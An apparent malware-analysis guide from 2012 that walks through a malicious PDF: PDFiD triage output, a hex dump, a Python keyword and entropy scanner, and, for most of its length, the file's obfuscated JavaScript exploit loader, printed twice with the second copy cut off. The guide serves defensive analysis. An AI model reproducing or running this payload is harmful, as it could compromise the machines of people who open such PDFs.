Guide Step by Step of Analysis Malicious PDF: infector1.pdf

MalwareMustDie, Nov 26th, 2012
//=========================================
// #MalwareMustDie | @unixfreaxjp ~]$ date
// Mon Nov 26 16:35:46 JST 2012
//
// Guide Step by Step of Analysis Malicious PDF : infector1.pdf
// With the decoding guide, step by step
// As per found in Case: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
//
// VT: https://www.virustotal.com/file/b771f74ff9c17682f15485bc11a7dd379cfea3b8b1f48b1391a5e53b7e693c2c/analysis/
// *) the material contains dangerous code, but we hexed it, so it cannot be used as it is.
//=========================================

// I confirmed the PDF file with my FreeBSD command below:
$ PDFiD0.0.11 ./infector1.pdf
 PDF Header: %PDF-1.4
 obj                   30
 endobj                30
 stream                 5
 endstream              5
 xref                   2
 trailer                2
 startxref              2
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    2
 /JavaScript            3
 /AA                    1
 /OpenAction            0
 /AcroForm              1
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /Colors > 2^24         0
 %%EOF                  2
 After last %%EOF       0
 D:20120917233320+04'00  /CreationDate
 D:20121029234204+03'00  /ModDate
 Total entropy:           5.796856 (     27836 bytes)
 Entropy inside streams:  5.910138 (      6474 bytes)
 Entropy outside streams: 5.212578 (     21362 bytes)

0000   25 50 44 46 2D 31 2E 34 0D 25 E2 E3 CF D3 0D 0A    %PDF-1.4.%......
0010   31 34 20 30 20 6F 62 6A 0D 3C 3C 2F 4C 69 6E 65    14 0 obj.<</Line
0020   61 72 69 7A 65 64 20 31 2F 4C 20 31 32 32 38 39    arized 1/L 12289
0030   2F 4F 20 32 30 2F 45 20 36 31 34 37 2F 4E 20 31    /O 20/E 6147/N 1
0040   2F 54 20 31 31 38 38 39 2F 48 20 5B 20 36 33 36    /T 11889/H [ 636
0050   20 31 37 34 5D 3E 3E 0D 65 6E 64 6F 62 6A 0D 20     174]>>.endobj.
0060   20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0070   20 20 0D 0A 78 72 65 66 0D 0A 31 34 20 31 37 0D      ..xref..14 17.
0080   0A 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30    .0000000016 0000

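// The keyword count and entropy split that PDFiD printed above, re-implemented as an added example (not PDFiD's own code, and the sample bytes are constructed, not infector1.pdf). It resolves #xx escapes in PDF names so that /J#53 is counted as /JS, matches bare keywords as whole words so obj is not also found inside endobj, and measures entropy inside and outside stream bodies; a non-zero /JS, /JavaScript or /AA count is exactly what flags the page's file for closer analysis.

```python
import math
import re
from collections import Counter

# The keywords PDFiD 0.0.11 reports on the page, in its output order.
KEYWORDS = ["obj", "endobj", "stream", "endstream", "xref", "trailer", "startxref",
            "/Page", "/Encrypt", "/ObjStm", "/JS", "/JavaScript", "/AA", "/OpenAction",
            "/AcroForm", "/JBIG2Decode", "/RichMedia", "/Launch"]

# A PDF name runs from '/' up to the next whitespace or delimiter character.
NAME_RE = re.compile(rb"/[^\s/<>\[\]()\{\}%]*")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def normalize_name(raw):
    """Resolve #xx escapes so that /J#53 and /JS are counted as the same name."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def count_keywords(data):
    """Names are counted by exact (normalized) match; bare keywords as whole words,
    so 'obj' is not found inside 'endobj' and 'xref' not inside 'startxref'."""
    names = Counter(normalize_name(m.group(0)) for m in NAME_RE.finditer(data))
    counts = {}
    for kw in KEYWORDS:
        if kw.startswith("/"):
            counts[kw] = names.get(kw.encode(), 0)
        else:
            pattern = rb"(?<![A-Za-z])" + re.escape(kw.encode()) + rb"(?![A-Za-z])"
            counts[kw] = len(re.findall(pattern, data))
    return counts


def entropy(data):
    """Shannon entropy in bits per byte, the figure PDFiD reports."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def stream_entropy(data):
    """Split the file into stream bodies and everything else, measure each part."""
    inside = b"".join(m.group(1) for m in STREAM_RE.finditer(data))
    outside = STREAM_RE.sub(b"", data)
    return {"total": entropy(data), "inside": entropy(inside), "outside": entropy(outside)}


def triage(data):
    """Return the keyword counts, the active-content keywords present, and entropies."""
    counts = count_keywords(data)
    active = [k for k in ("/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch", "/RichMedia")
              if counts[k]]
    return counts, active, stream_entropy(data)


# Constructed sample (not the page's file): one page with an /AA trigger pointing at a
# JavaScript action whose /JS key is written with a #xx hex escape.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<</Type/Catalog/Pages 2 0 R/AcroForm 6 0 R>>\nendobj\n"
    b"2 0 obj\n<</Type/Pages/Kids[3 0 R]/Count 1>>\nendobj\n"
    b"3 0 obj\n<</Type/Page/Parent 2 0 R/AA<</O 4 0 R>>>>\nendobj\n"
    b"4 0 obj\n<</S/JavaScript/J#53 5 0 R>>\nendobj\n"
    b"5 0 obj\n<</Length 11>>\nstream\nAAAAAAAAAAA\nendstream\nendobj\n"
    b"trailer\n<</Root 1 0 R>>\nstartxref\n0\n%%EOF\n"
)

if __name__ == "__main__":
    counts, active, ent = triage(SAMPLE_PDF)
    for kw in KEYWORDS:
        print(f" {kw:<22}{counts[kw]:>4}")
    print(" active content:", ", ".join(active) or "none")
    for part, value in ent.items():
        print(f" entropy {part:<8} {value:.6f}")
```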
=============================
PREPARING FOR DECODING PROCESS
=============================
// In the Hlen: 0x3D05 we can see the malicious JS code, as below:
<<
        /JS(
  59.         a='353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'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'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3q3b3c3f38193l341f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1t3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3k3s1g1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1l1l1q1m1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3i3p383l3
93f3i3q1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1r3i3p383l393f3i3q411'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3q3b3c3f3819353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1c1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e41393c3f3f353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1e3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1c3
m3j3l343s1t1h3r1l1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(a
pp.beep(0)).toString().substring(1,2)+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1h3r1l1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h193n2n2f3b2g35293q1'+parseInt(app.beep(0)).toString().substring(1,2)+'4141342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191'+parseInt(app.beep(0)).toString().substring(1,2)+'1f363b343l233n191h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c3919342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113f3p1u342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+parseInt(app.beep(0)).toString().substring(1,2)+'404019193m3p1u1u1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1
t1u1p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c39193f3p1u1u1o1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c391919193m3p1u1u1n1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193m3p1u1u1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1o1f1i1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c3919193f3p201u1q1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1q1f1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p201u1p1f1i1k1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1p1f1i1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u393o3h363n3c3i3h1134191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'413p343l113b1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193c1t1p1f1j1'+parseInt(app.beep(0)).toString().subst
ring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u361u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11381u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1u1h3r1p1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u362t39301u371c384134191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s34191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+parseInt(app.beep(0)).toString().substring(1,2)+'4136343n363b19381'+parseInt(app.beep(0)).toString().substring(1,2)+'3u4134191'+parseInt(app.beep(0)).toString().substring(1,2)+'4141';
        s='';
        for(i=0;i<a.length;i+=2){
                var jj = 0;
                try{loadXML({});}catch(e){jj=1}
                if (jj==1) s+=String.fromCharCode(parseInt(a[i]+a[i+1],31));
        }
        e=this;
        ev=/**/'eva'/**/;
        l='l';
        e=e[/*cas*/ev/*qwvq*/+l/*ebtt*/];
        e(s);
        )/S/JavaScript
>>


//
// Just strip the PDF tags and make the JS code look readable, as follows:
//

  79.  a='353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'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'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3q3b3c3f38193l341f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1t3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3k3s1g1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u373e3'+parseInt(app.beep(0)).toString().substring(1,2)+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1l1l1q1m1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3i3p383l393f3i3q
1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1r3i3p383l393f3i3q411'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3q3b3c3f3819353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1c1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e41393c3f3f353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s353f3i363e1u353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3m3o353m3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191h1d353c3'+parseInt(app.beep(0)).toString().substring(1,2)+'353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1e3m3j3l343s1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819353f3i363e1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1c3m3j3l34
3s1t1h3r1l1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+parseInt(app.beep(0)).toString().substring(1,2)+'41393o3h363n3c3i3h113'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+parseInt(app.beep
(0)).toString().substring(1,2)+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1h3r1l1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n2b363i3h193n2n2f3b2g35293q1'+parseInt(app.beep(0)).toString().substring(1,2)+'4141342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+parseInt(app.beep(0)).toString().substring(1,2)+'191'+parseInt(app.beep(0)).toString().substring(1,2)+'1f363b343l233n191h1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s3c1c1c1'+parseInt(app.b